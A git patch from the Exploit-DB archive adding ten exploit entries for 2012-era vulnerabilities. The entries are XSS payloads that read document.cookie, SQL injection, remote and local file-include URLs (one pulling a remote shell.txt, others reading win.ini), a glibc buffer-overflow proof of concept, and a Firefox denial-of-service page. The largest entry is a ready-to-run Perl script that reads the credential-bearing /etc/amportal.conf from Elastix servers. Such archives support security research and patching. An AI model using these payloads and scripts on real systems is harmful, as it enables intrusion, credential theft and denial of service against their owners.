From 8762b868bfc5210f05d014ae53444c9ccbe1640d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sun, 19 Jul 2015 05:01:52 +0000
Subject: [PATCH] DB: 2015-07-19

10 new exploits
---
 files.csv                         | 10 ++++++
 platforms/cgi/webapps/37638.txt   |  9 +++++
 platforms/linux/local/37631.c     | 28 ++++++++++++++++
 platforms/multiple/dos/37639.html | 23 +++++++++++++
 platforms/php/webapps/37630.txt   | 11 ++++++
 platforms/php/webapps/37632.txt   |  9 +++++
 platforms/php/webapps/37633.txt   |  7 ++++
 platforms/php/webapps/37634.txt   | 14 ++++++++
 platforms/php/webapps/37635.txt   | 13 +++++++
 platforms/php/webapps/37636.txt   | 15 +++++++++
 platforms/php/webapps/37637.pl    | 56 +++++++++++++++++++++++++++++++
 11 files changed, 195 insertions(+)
 create mode 100755 platforms/cgi/webapps/37638.txt
 create mode 100755 platforms/linux/local/37631.c
 create mode 100755 platforms/multiple/dos/37639.html
 create mode 100755 platforms/php/webapps/37630.txt
 create mode 100755 platforms/php/webapps/37632.txt
 create mode 100755 platforms/php/webapps/37633.txt
 create mode 100755 platforms/php/webapps/37634.txt
 create mode 100755 platforms/php/webapps/37635.txt
 create mode 100755 platforms/php/webapps/37636.txt
 create mode 100755 platforms/php/webapps/37637.pl

diff --git a/files.csv b/files.csv
index e9d92dfe5..bc34a320b 100755
--- a/files.csv
+++ b/files.csv
@@ -33963,3 +33963,13 @@ id,file,description,date,author,platform,type,port
 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
 37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80
+37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-09,"Yakir Wizman",php,webapps,0
+37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0
+37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0
+37633,platforms/php/webapps/37633.txt,"mIRC 'projects.php' Cross Site Scripting Vulnerability",2012-08-10,TayfunBasoglu,php,webapps,0
+37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Include Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0
+37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Include Vulnerability",2012-08-10,L0n3ly-H34rT,php,webapps,0
+37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0
+37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
+37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0
+37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0
diff --git a/platforms/cgi/webapps/37638.txt b/platforms/cgi/webapps/37638.txt
new file mode 100755
index 000000000..603219f31
--- /dev/null
+++ b/platforms/cgi/webapps/37638.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55082/info
+
+LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+LISTSERV 16 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script> 
\ No newline at end of file
diff --git a/platforms/linux/local/37631.c b/platforms/linux/local/37631.c
new file mode 100755
index 000000000..8bcc8aa96
--- /dev/null
+++ b/platforms/linux/local/37631.c
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/54982/info
+
+GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
+
+Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. 
+
+include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define EXPONENT "e-2147483649"
+#define SIZE 214748364
+int
+main (void)
+{
+  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
+  if (p == NULL)
+    {
+      perror ("malloc");
+      exit (EXIT_FAILURE);
+    }
+  p[0] = '1';
+  memset (p + 1, '0', SIZE);
+  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
+  double d = strtod (p, NULL);
+  printf ("%a\n", d);
+  exit (EXIT_SUCCESS);
+}
diff --git a/platforms/multiple/dos/37639.html b/platforms/multiple/dos/37639.html
new file mode 100755
index 000000000..03709ce0f
--- /dev/null
+++ b/platforms/multiple/dos/37639.html
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/55091/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.
+
+Mozilla Firefox 14.01 is affected; prior versions may also be affected. 
+
+<html>
+<head>
+<title></title>
+</head>
+<body></body>
+<script>
+function e(x)
+{
+  document.body.innerHTML += x;
+  e(x + 'x');
+};
+
+e('x')
+</script>
+</html>
diff --git a/platforms/php/webapps/37630.txt b/platforms/php/webapps/37630.txt
new file mode 100755
index 000000000..c96158dd1
--- /dev/null
+++ b/platforms/php/webapps/37630.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54980/info
+
+Hotel Booking Portal is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Hotel Booking Portal 0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
+http://www.example.com/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
+http://www.example.com/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/37632.txt b/platforms/php/webapps/37632.txt
new file mode 100755
index 000000000..d38ea361f
--- /dev/null
+++ b/platforms/php/webapps/37632.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54985/info
+
+Total Shop UK eCommerce CodeIgniter is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+CodeIgniter 2.1.2 is vulnerable; other versions may also be affected. 
+
+Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1"; 
diff --git a/platforms/php/webapps/37633.txt b/platforms/php/webapps/37633.txt
new file mode 100755
index 000000000..dba488c28
--- /dev/null
+++ b/platforms/php/webapps/37633.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/54989/info
+
+mIRC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/projects.php?go=maddons&offset=&order=id&sort=desc&mver=0&keywords=xss"><img src=x onerror=prompt(document.cookie);> 
\ No newline at end of file
diff --git a/platforms/php/webapps/37634.txt b/platforms/php/webapps/37634.txt
new file mode 100755
index 000000000..333245726
--- /dev/null
+++ b/platforms/php/webapps/37634.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/54991/info
+
+MindTouch DekiWiki is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the web server process. This may facilitate unauthorized access.
+
+MindTouch DekiWiki 10.1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt?
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.example.com/shell.txt?
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt?
+http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/37635.txt b/platforms/php/webapps/37635.txt
new file mode 100755
index 000000000..c1e913250
--- /dev/null
+++ b/platforms/php/webapps/37635.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/54992/info
+
+GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host are prone to a local file-include vulnerability because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+For GalaxyScripts Mini File Host:
+
+http://www.example.com/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
+
+For DaddyScripts Daddy's File Host:
+
+http://www.example.com/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg 
\ No newline at end of file
diff --git a/platforms/php/webapps/37636.txt b/platforms/php/webapps/37636.txt
new file mode 100755
index 000000000..a8515341c
--- /dev/null
+++ b/platforms/php/webapps/37636.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/55062/info
+
+The ShopperPress WordPress theme is prone to an SQL-injection and multiple cross-site vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow an attacker to steal cookie-based authentication credentials, to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database.
+
+ShopperPress 2.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/admin.php?page=images&p=0&search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
+
+http://www.example.com/wp-admin/admin.php?page=emails&edit=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
+
+http://www.example.com/wp-admin/admin.php?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
+
+http://www.example.com/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/37637.pl b/platforms/php/webapps/37637.pl
new file mode 100755
index 000000000..17c4c3890
--- /dev/null
+++ b/platforms/php/webapps/37637.pl
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/55078/info
+
+Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
+
+Elastix 2.2.0 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl -w
+
+#------------------------------------------------------------------------------------# 
+#Elastix is an Open Source Sofware to establish Unified Communications. 
+#About this concept, Elastix goal is to incorporate all the communication alternatives,
+#available at an enterprise level, into a unique solution.
+#------------------------------------------------------------------------------------#
+############################################################
+# Exploit Title: Elastix 2.2.0 LFI
+# Google Dork: :(
+# Author: cheki
+# Version:Elastix 2.2.0
+# Tested on: multiple
+# CVE : notyet
+# romanc-_-eyes ;) 
+# Discovered by romanc-_-eyes
+# vendor http://www.elastix.org/
+
+print "\t Elastix 2.2.0 LFI Exploit \n";
+print "\t code author cheki   \n";
+print "\t 0day Elastix 2.2.0  \n";
+print "\t email: anonymous17hacker{}gmail.com \n";
+
+#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
+
+use LWP::UserAgent;
+print "\n Target: https://ip ";
+chomp(my $target=<STDIN>);
+$dir="vtigercrm";
+$poc="current_language";
+$etc="etc";
+$jump="../../../../../../../..//";
+$test="amportal.conf%00";
+
+$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
+$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
+$res = $code->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
+ 
+print "\n read amportal.conf file : $answer \n\n";
+print " successful read\n";
+ 
+}
+else { 
+print "\n[-] not successful\n";
+	}
+